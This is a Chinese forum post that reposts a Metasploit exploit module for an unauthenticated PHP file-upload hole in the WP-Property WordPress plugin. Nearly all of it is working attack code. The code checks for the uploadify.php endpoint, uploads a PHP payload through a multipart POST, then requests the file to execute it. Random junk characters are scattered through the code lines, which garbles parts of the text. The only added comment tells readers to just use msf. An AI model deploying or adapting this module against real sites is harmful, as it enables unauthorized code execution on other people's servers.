找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2305|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞' ~! j3 u$ m* G  m  Y0 q9 o& ^

: N  ?% O; ^+ q2 j ## # This file is part of the Metasploit Framework and may be subject to
4 F0 z# q: }  }2 [# G" f7 J9 F4 Z
( e7 Z3 W8 l2 p# redistribution and commercial restrictions. Please see the Metasploit
5 ~. [+ X4 w. }  _" E
  O* p& b" v" x6 A1 b# Framework web site for more information on licensing and terms of use.
2 N5 d6 O+ ^* s# J; Y. B, r2 `0 r5 t* S, V+ v( S" z
#   http://metasploit.com/framework/ ##4 U, N  W  c% t

8 @3 ~; y/ G7 d3 ^/ O' ^  y
4 l+ A% l$ [7 q( Y: g' N6 \  N" v2 \7 G: \( |
! N+ ?, m! D/ K4 H

2 T1 ?+ j0 V. @1 }' J- K9 D" Zrequire 'msf/core'
" u$ X- k$ Q+ A9 ]& E' rrequire 'msf/core/exploit/php_exe'
0 g, M9 [9 ~3 Y9 H
: M. i0 i. ~' ?0 E/ i+ Gclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
5 w) u# W0 U/ }, W; ~8 @'Description'    => %q{$ o* ?, R1 A, d% x- t# b8 [
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
& M* w: g# h: f. M+ R. ]" h* |$ T[
  E- A; k( m5 m& J6 y: H'Sammy FORGIT', # initial discovery4 Y6 v  I6 o0 a5 T1 l3 g
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
& ^: u5 I& E* {; d],
) ?1 o* t9 X/ s+ t8 R  Z'License'        => MSF_LICENSE,
! F9 D' C+ T! e'References'     =>) }7 I, V+ _- N: S+ {; P# J' c6 D% [
[
1 P& v# H0 Q) Z# g& U[ 'OSVDB', '82656' ],
& \, r7 E8 U/ r# z/ j: K9 t) T[ 'BID', '53787' ],) s. N5 d( g6 b/ H5 G- V7 I1 o* p
[ 'EDB', '18987'],
0 ?, ?$ \( r" b& \" \. a+ F[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
4 ]$ D# K; B3 z- k]," H% \( q* ?) @4 d  T" C
'Payload'        =>2 n, L) V) G; b& U; V; T$ D
{, M5 S$ i/ ]4 l+ |$ x7 Q
'BadChars' => "\x00",/ f  R5 o: i( C8 F  [/ A
},, H9 X/ A. [+ v2 m
'Platform'       => 'php',2 H2 W) [2 |1 h1 \1 @, j" e+ h8 a
'Arch'           => ARCH_PHP," m% x3 f% L2 H% N( t6 V; @  d
'Targets'        =>4 y3 M; B' N9 P/ Z. N7 r5 Z8 B* p3 f
[
4 y) m8 T% u5 T+ w3 D' {+ m$ R[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
& K9 }' f0 }% K) B% x8 F[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
/ }, u" `9 {/ v4 h! E" c* D],  D8 L4 g6 i3 q) X% h% H- \0 H: `7 I
'DefaultTarget'  => 0,  d8 @  A; l7 E5 F$ T: ]% p" V
'DisclosureDate' => 'Mar 26 2012')); ?3 \0 J" }& |

$ B  Z+ c8 T# ^5 @" Aregister_options(7 ?, d  M( Y! O% I- N
[
/ V. @6 c  x) r8 cOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
- y$ R/ ~+ U1 O; w], self.class)5 j$ `& Q( D8 D4 J3 k
end
( |0 n( p8 P( Z" f9 E0 b
( G+ ~7 c# I% i& p  o7 ]def check
/ H4 I% k+ e# \9 e$ u) Vuri =  target_uri.path
4 F; L% g$ u5 p+ p6 S# Q' T' xuri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',2 q7 F8 N5 N# M1 I2 l- r$ r' A) l9 `
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
( O/ h% G: P; B: i; ~' r}); y; [5 \, J2 b( N5 u
1 e7 l1 L9 U( m# S
if not res or res.code != 200$ n2 I) L8 w" C+ a$ H
return Exploit::CheckCode::Unknown
+ n7 R9 k& K4 y& z- xend
0 ~# w- G8 a7 G: s1 S) ^! o
2 H  m! ]  r* R/ t, }2 B) x9 x! r2 L; lreturn Exploit::CheckCode::Appears
* H& e4 B# Y" n. |4 S' T# uend' F1 v, z6 o  @8 [2 [# p9 ~. \9 H

3 v) b: n. ?! p+ M4 m* z% L5 Fdef exploit
; R) N' l) L7 ]% g; H( D7 h4 buri =  target_uri.path' ~1 W- J  J9 \, p8 u! d
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)+ j4 q. d# p- t, ?0 }( ]9 ?4 v

4 g: n& Q4 R8 ?- t  |data = Rex::MIME::Message.new
" h. F: `& I: ^: tdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
: }. `! x8 }9 [* V, S: g6 Tdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
* U) I" ~& |( b. npost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, _3 U6 x; ]- a3 P7 c8 ~, ]
  z3 J  A; @0 \# S$ u) j( ^! dprint_status("#{peer} - Uploading payload #{@payload_name}")0 a$ }9 X0 G+ w- ~
res = send_request_cgi({. z4 F/ x9 p7 p& v( ^1 I! T
'method' => 'POST',
$ |7 ^9 n7 K% t, x$ M# m- L; E'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
4 I. h: M! a& E4 N* h3 z5 j" o'ctype'  => "multipart/form-data; boundary=#{data.bound}",
4 s* c5 m6 g5 Q* L+ q" Q; `% R'data'   => post_data) R" r# x9 |8 ~; a  N
})
0 t: Z' |7 w" F  ~
( J4 A, I$ y9 Y# B/ V7 J, `if not res or res.code != 200 or res.body !~ /#{@payload_name}/: f% A4 m3 q0 V1 p$ V: B
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")+ O1 e& H9 S# Q) [/ \0 h2 u, M
end/ F4 k- b5 Y* R1 U! f  E
% X* U2 J' \0 b
upload_uri = res.body
) @6 w! P: e( Q: W" G- A
; F% x  j- [. R7 Iprint_status("#{peer} - Executing payload #{@payload_name}")3 Y. J' t1 ]! E# t6 Z: [
res = send_request_raw({& a5 g/ B4 z% w5 x- b; E
'uri'    => upload_uri," ^4 l- |; K; \. G
'method' => 'GET'
/ P6 O" U, \- J* M! y8 s% a  q})
7 g* c' z: i$ G) b+ cend
! d4 L& j1 f5 x6 U" Send
, C/ s" T. F# Y; |: x
2 q" j" b# l& F! H* f不要问我这写的是什么 怎么利用 我是说msf.
, c4 p. B+ m! Z
! N6 F2 i9 s- b0 ], M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表